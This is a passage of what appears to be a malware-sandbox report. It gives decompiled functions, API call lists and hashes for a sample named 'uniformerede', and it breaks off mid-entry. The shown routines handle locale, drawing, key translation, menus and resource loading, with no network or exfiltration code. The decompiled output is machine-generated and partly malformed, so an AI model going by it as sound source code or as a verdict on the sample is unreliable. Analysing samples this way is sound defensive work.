                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3990497365-0
                                                                                                                                                                                                                            • Opcode ID: 1c0917a406aa7aee44b8f202aeb6635a21d865d56fb6b92b010c2cb50a980a5f
                                                                                                                                                                                                                            • Instruction ID: 4fe94cffe00b8ae50479b7d7830d31852d6d04f91b779ba97ffbb5203982a357
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c0917a406aa7aee44b8f202aeb6635a21d865d56fb6b92b010c2cb50a980a5f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 70415270A002589BDB21DB59CC85BDAB7FD9B18305F0441FAB548F7282D7789F88CB59
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0040E174 Relevance: 6.1, APIs: 4, Instructions: 95threadCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0040E174() {
				char _v152;
				short _v410;
				signed short _t14;
				signed int _t16;
				int _t18;
				void* _t20;
				void* _t23;
				int _t24;
				int _t26;
				signed int _t30;
				signed int _t31;
				signed int _t32;
				signed int _t37;
				int* _t39;
				short* _t41;
				void* _t49;

				 *0x49e744 = 0x409;
				 *0x49e748 = 9;
				 *0x49e74c = 1;
				_t14 = GetThreadLocale();
				if(_t14 != 0) {
					 *0x49e744 = _t14;
				}
				if(_t14 != 0) {
					 *0x49e748 = _t14 & 0x3ff;
					 *0x49e74c = (_t14 & 0x0000ffff) >> 0xa;
				}
				memcpy(0x49b134, 0x40e2c8, 8 << 2);
				if( *0x49b0ec != 2) {
					_t16 = GetSystemMetrics(0x4a);
					__eflags = _t16;
					 *0x49e751 = _t16 & 0xffffff00 | _t16 != 0x00000000;
					_t18 = GetSystemMetrics(0x2a);
					__eflags = _t18;
					_t31 = _t30 & 0xffffff00 | _t18 != 0x00000000;
					 *0x49e750 = _t31;
					__eflags = _t31;
					if(__eflags != 0) {
						return E0040E0FC(__eflags, _t49);
					}
				} else {
					_t20 = E0040E15C();
					if(_t20 != 0) {
						 *0x49e751 = 0;
						 *0x49e750 = 0;
						return _t20;
					}
					E0040E0FC(__eflags, _t49);
					_t37 = 0x20;
					_t23 = E00403718(0x49b134, 0x20, 0x40e2c8);
					_t32 = _t30 & 0xffffff00 | __eflags != 0x00000000;
					 *0x49e750 = _t32;
					__eflags = _t32;
					if(_t32 != 0) {
						 *0x49e751 = 0;
						return _t23;
					}
					_t24 = 0x80;
					_t39 =  &_v152;
					do {
						 *_t39 = _t24;
						_t24 = _t24 + 1;
						_t39 =  &(_t39[0]);
						__eflags = _t24 - 0x100;
					} while (_t24 != 0x100);
					_t26 =  *0x49e744; // 0x409
					GetStringTypeA(_t26, 2,  &_v152, 0x80,  &_v410);
					_t18 = 0x80;
					_t41 =  &_v410;
					while(1) {
						__eflags =  *_t41 - 2;
						_t37 = _t37 & 0xffffff00 |  *_t41 == 0x00000002;
						 *0x49e751 = _t37;
						__eflags = _t37;
						if(_t37 != 0) {
							goto L17;
						}
						_t41 = _t41 + 2;
						_t18 = _t18 - 1;
						__eflags = _t18;
						if(_t18 != 0) {
							continue;
						} else {
							return _t18;
						}
						L18:
					}
				}
				L17:
				return _t18;
				goto L18;
			}



















                                                                                                                                                                                                                            0x0040e180
                                                                                                                                                                                                                            0x0040e18a
                                                                                                                                                                                                                            0x0040e194
                                                                                                                                                                                                                            0x0040e19e
                                                                                                                                                                                                                            0x0040e1a5
                                                                                                                                                                                                                            0x0040e1a7
                                                                                                                                                                                                                            0x0040e1a7
                                                                                                                                                                                                                            0x0040e1af
                                                                                                                                                                                                                            0x0040e1bb
                                                                                                                                                                                                                            0x0040e1c7
                                                                                                                                                                                                                            0x0040e1c7
                                                                                                                                                                                                                            0x0040e1db
                                                                                                                                                                                                                            0x0040e1e4
                                                                                                                                                                                                                            0x0040e293
                                                                                                                                                                                                                            0x0040e298
                                                                                                                                                                                                                            0x0040e29d
                                                                                                                                                                                                                            0x0040e2a4
                                                                                                                                                                                                                            0x0040e2a9
                                                                                                                                                                                                                            0x0040e2ab
                                                                                                                                                                                                                            0x0040e2ae
                                                                                                                                                                                                                            0x0040e2b4
                                                                                                                                                                                                                            0x0040e2b6
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040e2be
                                                                                                                                                                                                                            0x0040e1ea
                                                                                                                                                                                                                            0x0040e1ea
                                                                                                                                                                                                                            0x0040e1f1
                                                                                                                                                                                                                            0x0040e1f3
                                                                                                                                                                                                                            0x0040e1fa
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040e1fa
                                                                                                                                                                                                                            0x0040e207
                                                                                                                                                                                                                            0x0040e217
                                                                                                                                                                                                                            0x0040e219
                                                                                                                                                                                                                            0x0040e21e
                                                                                                                                                                                                                            0x0040e221
                                                                                                                                                                                                                            0x0040e227
                                                                                                                                                                                                                            0x0040e229
                                                                                                                                                                                                                            0x0040e22b
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040e22b
                                                                                                                                                                                                                            0x0040e237
                                                                                                                                                                                                                            0x0040e23c
                                                                                                                                                                                                                            0x0040e242
                                                                                                                                                                                                                            0x0040e242
                                                                                                                                                                                                                            0x0040e244
                                                                                                                                                                                                                            0x0040e245
                                                                                                                                                                                                                            0x0040e246
                                                                                                                                                                                                                            0x0040e246
                                                                                                                                                                                                                            0x0040e262
                                                                                                                                                                                                                            0x0040e268
                                                                                                                                                                                                                            0x0040e26d
                                                                                                                                                                                                                            0x0040e272
                                                                                                                                                                                                                            0x0040e278
                                                                                                                                                                                                                            0x0040e278
                                                                                                                                                                                                                            0x0040e27c
                                                                                                                                                                                                                            0x0040e27f
                                                                                                                                                                                                                            0x0040e285
                                                                                                                                                                                                                            0x0040e287
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040e289
                                                                                                                                                                                                                            0x0040e28c
                                                                                                                                                                                                                            0x0040e28c
                                                                                                                                                                                                                            0x0040e28d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040e28d
                                                                                                                                                                                                                            0x0040e278
                                                                                                                                                                                                                            0x0040e2c5
                                                                                                                                                                                                                            0x0040e2c5
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040E268
                                                                                                                                                                                                                            • GetThreadLocale.KERNEL32 ref: 0040E19E
                                                                                                                                                                                                                              • Part of subcall function 0040E0FC: GetCPInfo.KERNEL32(00000000,?), ref: 0040E115
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: InfoLocaleStringThreadType
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1505017576-0
                                                                                                                                                                                                                            • Opcode ID: 1b5189a54573d4c7bc765412fd1a201bd6ca0c6f5f23b6c438d2b3680be01391
                                                                                                                                                                                                                            • Instruction ID: 1e0c14cada7a8142f74d55e3307cde86d26a5cdea6c2c893cd231fda4e8750a6
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1b5189a54573d4c7bc765412fd1a201bd6ca0c6f5f23b6c438d2b3680be01391
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C13124316443958AE720D7A7AC017663B99E762344F0888FFE484AB3D2EB7C4855876F
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00428D80 Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 64%
                                                                                                                                                                                                                            			E00428D80(intOrPtr __eax, void* __edx) {
				intOrPtr _v8;
				void* __ebx;
				void* __ecx;
				void* __esi;
				void* __ebp;
				intOrPtr _t33;
				struct HDC__* _t47;
				intOrPtr _t54;
				intOrPtr _t58;
				struct HDC__* _t66;
				void* _t67;
				intOrPtr _t76;
				void* _t81;
				intOrPtr _t82;
				intOrPtr _t84;
				intOrPtr _t86;

				_t84 = _t86;
				_push(_t67);
				_v8 = __eax;
				_t33 = _v8;
				if( *((intOrPtr*)(_t33 + 0x58)) == 0) {
					return _t33;
				} else {
					E004259F4(_v8);
					_push(_t84);
					_push(0x428e5f);
					_push( *[fs:eax]);
					 *[fs:eax] = _t86;
					E0042A188( *((intOrPtr*)(_v8 + 0x58)));
					E00428BFC( *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8));
					_t47 = E0042A288( *((intOrPtr*)(_v8 + 0x58)));
					_push(0);
					L004072E0();
					_t66 = _t47;
					_t81 =  *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8);
					if(_t81 == 0) {
						 *((intOrPtr*)(_v8 + 0x5c)) = 0;
					} else {
						 *((intOrPtr*)(_v8 + 0x5c)) = SelectObject(_t66, _t81);
					}
					_t54 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28));
					_t82 =  *((intOrPtr*)(_t54 + 0x10));
					if(_t82 == 0) {
						 *((intOrPtr*)(_v8 + 0x60)) = 0;
					} else {
						_push(0xffffffff);
						_push(_t82);
						_push(_t66);
						L00407440();
						 *((intOrPtr*)(_v8 + 0x60)) = _t54;
						_push(_t66);
						L00407418();
					}
					E00425CE8(_v8, _t66);
					_t58 =  *0x49b8ac; // 0x2210acc
					E0041AFE4(_t58, _t66, _t67, _v8, _t82);
					_pop(_t76);
					 *[fs:eax] = _t76;
					_push(0x428e66);
					return E00425B60(_v8);
				}
			}



















                                                                                                                                                                                                                            0x00428d81
                                                                                                                                                                                                                            0x00428d83
                                                                                                                                                                                                                            0x00428d86
                                                                                                                                                                                                                            0x00428d89
                                                                                                                                                                                                                            0x00428d90
                                                                                                                                                                                                                            0x00428e6a
                                                                                                                                                                                                                            0x00428d96
                                                                                                                                                                                                                            0x00428d99
                                                                                                                                                                                                                            0x00428da0
                                                                                                                                                                                                                            0x00428da1
                                                                                                                                                                                                                            0x00428da6
                                                                                                                                                                                                                            0x00428da9
                                                                                                                                                                                                                            0x00428db2
                                                                                                                                                                                                                            0x00428dc3
                                                                                                                                                                                                                            0x00428dce
                                                                                                                                                                                                                            0x00428dd3
                                                                                                                                                                                                                            0x00428dd5
                                                                                                                                                                                                                            0x00428dda
                                                                                                                                                                                                                            0x00428de5
                                                                                                                                                                                                                            0x00428dea
                                                                                                                                                                                                                            0x00428e00
                                                                                                                                                                                                                            0x00428dec
                                                                                                                                                                                                                            0x00428df6
                                                                                                                                                                                                                            0x00428df6
                                                                                                                                                                                                                            0x00428e09
                                                                                                                                                                                                                            0x00428e0c
                                                                                                                                                                                                                            0x00428e11
                                                                                                                                                                                                                            0x00428e2f
                                                                                                                                                                                                                            0x00428e13
                                                                                                                                                                                                                            0x00428e13
                                                                                                                                                                                                                            0x00428e15
                                                                                                                                                                                                                            0x00428e16
                                                                                                                                                                                                                            0x00428e17
                                                                                                                                                                                                                            0x00428e1f
                                                                                                                                                                                                                            0x00428e22
                                                                                                                                                                                                                            0x00428e23
                                                                                                                                                                                                                            0x00428e23
                                                                                                                                                                                                                            0x00428e37
                                                                                                                                                                                                                            0x00428e3f
                                                                                                                                                                                                                            0x00428e44
                                                                                                                                                                                                                            0x00428e4b
                                                                                                                                                                                                                            0x00428e4e
                                                                                                                                                                                                                            0x00428e51
                                                                                                                                                                                                                            0x00428e5e
                                                                                                                                                                                                                            0x00428e5e

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 004259F4: RtlEnterCriticalSection.KERNEL32(0049E8C8,00000000,004244A2,00000000,00424501), ref: 004259FC
                                                                                                                                                                                                                              • Part of subcall function 004259F4: RtlLeaveCriticalSection.KERNEL32(0049E8C8,0049E8C8,00000000,004244A2,00000000,00424501), ref: 00425A09
                                                                                                                                                                                                                              • Part of subcall function 004259F4: RtlEnterCriticalSection.KERNEL32(00000038,0049E8C8,0049E8C8,00000000,004244A2,00000000,00424501), ref: 00425A12
                                                                                                                                                                                                                              • Part of subcall function 0042A288: 73C9AC50.USER32(00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A2DE
                                                                                                                                                                                                                              • Part of subcall function 0042A288: 73C9AD70.GDI32(00000000,0000000C,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A2F3
                                                                                                                                                                                                                              • Part of subcall function 0042A288: 73C9AD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A2FD
                                                                                                                                                                                                                              • Part of subcall function 0042A288: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A321
                                                                                                                                                                                                                              • Part of subcall function 0042A288: 73C9B380.USER32(00000000,00000000,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A32C
                                                                                                                                                                                                                            • 73C9A590.GDI32(00000000,00000000,00428E5F), ref: 00428DD5
                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 00428DEE
                                                                                                                                                                                                                            • 73C9B410.GDI32(00000000,?,000000FF,00000000,00000000,00428E5F), ref: 00428E17
                                                                                                                                                                                                                            • 73C9B150.GDI32(00000000,00000000,?,000000FF,00000000,00000000,00428E5F), ref: 00428E23
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CriticalSection$Enter$A590B150B380B410CreateHalftoneLeaveObjectPaletteSelect
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2198039625-0
                                                                                                                                                                                                                            • Opcode ID: 5978f05ee8a23c54c1cf2e5b513bf4356140515cda6447ae178a7266121df848
                                                                                                                                                                                                                            • Instruction ID: e9c466939ba293ac9df73ed0eb373398a4389f67f4d1c2ae1c2642ffffdfa89f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5978f05ee8a23c54c1cf2e5b513bf4356140515cda6447ae178a7266121df848
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D2314870B05624EFC704DB59D981D5EB7E4EF08324BA241AAF404AB362CB38EE40DB54
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0047689C Relevance: 6.1, APIs: 4, Instructions: 81keyboardCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 76%
                                                                                                                                                                                                                            			E0047689C(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				short _v6;
				char _v262;
				int _v268;
				char _v272;
				struct HKL__* _t25;
				struct HKL__* _t28;
				int _t30;
				void* _t45;
				unsigned int _t52;
				intOrPtr _t56;
				int _t65;
				void* _t68;

				_v272 = 0;
				_v268 = 0;
				_t45 = __edx;
				_push(_t68);
				_push(0x47699d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t68 + 0xfffffef4;
				 *0x49ec4c = GetKeyboardLayout(0);
				GetKeyboardState( &_v262);
				_t25 =  *0x49ec4c; // 0x0
				_t28 =  *0x49ec4c; // 0x0
				_t65 =  *(_t45 + 4);
				_t30 = ToAsciiEx(_t65, MapVirtualKeyExA(_t65, 2, _t28),  &_v262,  &_v6, 0, _t25);
				_t52 =  *(_t45 + 8);
				if((_t52 & 0x80000000) != 0) {
					if((_t52 >> 0x0000001f & 0x00000001) == 1 && _t30 < 1 &&  *0x49ec50 != 0) {
						E00404BA8();
						E00476A9C(_t45, _v272,  *(_t45 + 4));
					}
				} else {
					if(_t30 <= 0) {
						 *0x49ec50 =  *(_t45 + 4);
					} else {
						E00404BA8();
						E00476A9C(_t45, _v268,  *(_t45 + 4));
						 *0x49ec50 = 0;
					}
				}
				_pop(_t56);
				 *[fs:eax] = _t56;
				_push(0x4769a4);
				return E004049E4( &_v272, 2);
			}















                                                                                                                                                                                                                            0x004768aa
                                                                                                                                                                                                                            0x004768b0
                                                                                                                                                                                                                            0x004768b6
                                                                                                                                                                                                                            0x004768bc
                                                                                                                                                                                                                            0x004768bd
                                                                                                                                                                                                                            0x004768c2
                                                                                                                                                                                                                            0x004768c5
                                                                                                                                                                                                                            0x004768cf
                                                                                                                                                                                                                            0x004768db
                                                                                                                                                                                                                            0x004768e0
                                                                                                                                                                                                                            0x004768f3
                                                                                                                                                                                                                            0x004768fb
                                                                                                                                                                                                                            0x00476906
                                                                                                                                                                                                                            0x0047690b
                                                                                                                                                                                                                            0x00476914
                                                                                                                                                                                                                            0x00476952
                                                                                                                                                                                                                            0x0047696a
                                                                                                                                                                                                                            0x0047697a
                                                                                                                                                                                                                            0x0047697a
                                                                                                                                                                                                                            0x00476916
                                                                                                                                                                                                                            0x00476918
                                                                                                                                                                                                                            0x00476944
                                                                                                                                                                                                                            0x0047691a
                                                                                                                                                                                                                            0x00476923
                                                                                                                                                                                                                            0x00476933
                                                                                                                                                                                                                            0x0047693a
                                                                                                                                                                                                                            0x0047693a
                                                                                                                                                                                                                            0x00476918
                                                                                                                                                                                                                            0x00476981
                                                                                                                                                                                                                            0x00476984
                                                                                                                                                                                                                            0x00476987
                                                                                                                                                                                                                            0x0047699c

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetKeyboardLayout.USER32 ref: 004768CA
                                                                                                                                                                                                                            • GetKeyboardState.USER32(?,00000000,00000000,0047699D), ref: 004768DB
                                                                                                                                                                                                                            • MapVirtualKeyExA.USER32 ref: 004768FF
                                                                                                                                                                                                                            • ToAsciiEx.USER32(?,00000000,?,00000002,00000000,?), ref: 00476906
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Keyboard$AsciiLayoutStateVirtual
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 692081290-0
                                                                                                                                                                                                                            • Opcode ID: 1248bf323bd48c016888fbbeb679fa92d4c20e3ba547b737b312a868d1fbd519
                                                                                                                                                                                                                            • Instruction ID: 89de63ba6f27cd6f45779958db8435fcd8f77a32cbffcd1c99df830e07254f94
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1248bf323bd48c016888fbbeb679fa92d4c20e3ba547b737b312a868d1fbd519
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9D21B1B05045049EDB10DF15CC82BEA77BAEB59310F05C4B7E988A7341DA38AD408F59
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0044E7A8 Relevance: 6.1, APIs: 4, Instructions: 72windowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0044E7A8(void* __eax, struct HMENU__* __edx, int _a4, int _a8, CHAR* _a12) {
				intOrPtr _v8;
				void* __ecx;
				void* __edi;
				int _t27;
				void* _t40;
				int _t41;
				int _t50;

				_t50 = _t41;
				_t49 = __edx;
				_t40 = __eax;
				if(E0044DEB4(__eax) == 0) {
					return GetMenuStringA(__edx, _t50, _a12, _a8, _a4);
				}
				_v8 = 0;
				if((GetMenuState(__edx, _t50, _a4) & 0x00000010) == 0) {
					_t27 = GetMenuItemID(_t49, _t50);
					_t51 = _t27;
					if(_t27 != 0xffffffff) {
						_v8 = E0044DD30(_t40, 0, _t51);
					}
				} else {
					_t49 = GetSubMenu(_t49, _t50);
					_v8 = E0044DD30(_t40, 1, _t37);
				}
				if(_v8 == 0) {
					return 0;
				} else {
					 *_a12 = 0;
					E0040A044(_a12, _a8,  *((intOrPtr*)(_v8 + 0x30)));
					return E00409F88(_a12, _t49);
				}
			}










                                                                                                                                                                                                                            0x0044e7af
                                                                                                                                                                                                                            0x0044e7b1
                                                                                                                                                                                                                            0x0044e7b3
                                                                                                                                                                                                                            0x0044e7be
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044e842
                                                                                                                                                                                                                            0x0044e7c2
                                                                                                                                                                                                                            0x0044e7d2
                                                                                                                                                                                                                            0x0044e7ef
                                                                                                                                                                                                                            0x0044e7f4
                                                                                                                                                                                                                            0x0044e7f9
                                                                                                                                                                                                                            0x0044e806
                                                                                                                                                                                                                            0x0044e806
                                                                                                                                                                                                                            0x0044e7d4
                                                                                                                                                                                                                            0x0044e7db
                                                                                                                                                                                                                            0x0044e7e8
                                                                                                                                                                                                                            0x0044e7e8
                                                                                                                                                                                                                            0x0044e80d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044e80f
                                                                                                                                                                                                                            0x0044e812
                                                                                                                                                                                                                            0x0044e821
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044e829

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Menu$ItemStateString
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 306270399-0
                                                                                                                                                                                                                            • Opcode ID: 2c19fe086be550dc174a8887d2ac99f30179e1944e787361f9f2a990d3dbd57d
                                                                                                                                                                                                                            • Instruction ID: 91f26849067dd0ec4125c5b687d67a274517b3145466c284ab5c31d893fdeaa7
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2c19fe086be550dc174a8887d2ac99f30179e1944e787361f9f2a990d3dbd57d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 43118131A05204AFDB00EE6ECC85AAF77E8AF49364B10442AF915D7382DA39DD0197A9
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00474C10 Relevance: 6.1, APIs: 4, Instructions: 58libraryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 55%
                                                                                                                                                                                                                            			E00474C10(intOrPtr __eax, void* __ebx, char __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v12;
				void* _t19;
				intOrPtr _t35;
				intOrPtr _t36;
				struct HINSTANCE__* _t40;
				void* _t42;
				void* _t43;
				intOrPtr _t44;

				_t42 = _t43;
				_t44 = _t43 + 0xfffffff8;
				_v12 = __edx;
				_v8 = __eax;
				E00404E70(_v8);
				E00404E70(_v12);
				_push(_t42);
				_push(0x474cbf);
				_push( *[fs:eax]);
				 *[fs:eax] = _t44;
				_push(_t42);
				_push(0x474c8c);
				_push( *[fs:edx]);
				 *[fs:edx] = _t44;
				_t40 = LoadLibraryA(E00404E80(_v8));
				_t19 = FindResourceA(_t40, E00404E80(_v12), 0xa);
				if(_t19 != 0) {
				}
				FreeResource(_t19);
				FreeLibrary(_t40);
				_pop(_t35);
				 *[fs:eax] = _t35;
				_pop(_t36);
				 *[fs:eax] = _t36;
				_push(0x474cc6);
				return E004049E4( &_v12, 2);
			}












                                                                                                                                                                                                                            0x00474c11
                                                                                                                                                                                                                            0x00474c13
                                                                                                                                                                                                                            0x00474c19
                                                                                                                                                                                                                            0x00474c1c
                                                                                                                                                                                                                            0x00474c22
                                                                                                                                                                                                                            0x00474c2a
                                                                                                                                                                                                                            0x00474c31
                                                                                                                                                                                                                            0x00474c32
                                                                                                                                                                                                                            0x00474c37
                                                                                                                                                                                                                            0x00474c3a
                                                                                                                                                                                                                            0x00474c3f
                                                                                                                                                                                                                            0x00474c40
                                                                                                                                                                                                                            0x00474c45
                                                                                                                                                                                                                            0x00474c48
                                                                                                                                                                                                                            0x00474c59
                                                                                                                                                                                                                            0x00474c67
                                                                                                                                                                                                                            0x00474c6e
                                                                                                                                                                                                                            0x00474c6e
                                                                                                                                                                                                                            0x00474c77
                                                                                                                                                                                                                            0x00474c7d
                                                                                                                                                                                                                            0x00474c84
                                                                                                                                                                                                                            0x00474c87
                                                                                                                                                                                                                            0x00474ca6
                                                                                                                                                                                                                            0x00474ca9
                                                                                                                                                                                                                            0x00474cac
                                                                                                                                                                                                                            0x00474cbe

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00000000,00000000,00474C8C,?,00000000,00474CBF), ref: 00474C54
                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00000000,00000000,0000000A), ref: 00474C67
                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,00000000,00000000,0000000A,00000000,00000000,00474C8C,?,00000000,00474CBF), ref: 00474C77
                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,00000000,00000000,00000000,0000000A,00000000,00000000,00474C8C,?,00000000,00474CBF), ref: 00474C7D
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FreeLibraryResource$FindLoad
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 622515136-0
                                                                                                                                                                                                                            • Opcode ID: 2b57222de1b4dc2aa53542cd692cdd0052a20a2f8b05dd666ba465e97723cdf0
